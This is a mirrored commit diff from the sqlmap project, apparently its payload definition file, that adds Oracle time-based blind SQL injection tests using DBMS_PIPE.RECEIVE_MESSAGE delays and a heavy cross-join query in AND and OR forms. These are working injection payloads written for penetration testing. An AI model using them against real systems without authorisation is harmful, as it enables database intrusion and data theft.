mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-11-04 01:47:37 +03:00 
			
		
		
		
	added one more time based blind for Oracle
This commit is contained in:
		
							parent
							
								
									7697d19292
								
							
						
					
					
						commit
						1031723c89
					
				| 
						 | 
				
			
			@ -1420,10 +1420,28 @@ Formats:
 | 
			
		|||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle AND time-based blind</title>
 | 
			
		||||
        <stype>5</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle AND time-based blind (heavy query)</title>
 | 
			
		||||
        <stype>5</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
| 
						 | 
				
			
			@ -1562,12 +1580,30 @@ Formats:
 | 
			
		|||
    </test>
 | 
			
		||||
    
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle OR time-based blind (heavy query)</title>
 | 
			
		||||
        <title>Oracle OR time-based blind</title>
 | 
			
		||||
        <stype>5</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>3</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle OR time-based blind (heavy query)</title>
 | 
			
		||||
        <stype>5</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>4</risk>
 | 
			
		||||
        <clause>1,2,3</clause>
 | 
			
		||||
        <where>2</where>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
| 
						 | 
				
			
			
 | 
			
		|||
		Loading…
	
		Reference in New Issue
	
	Block a user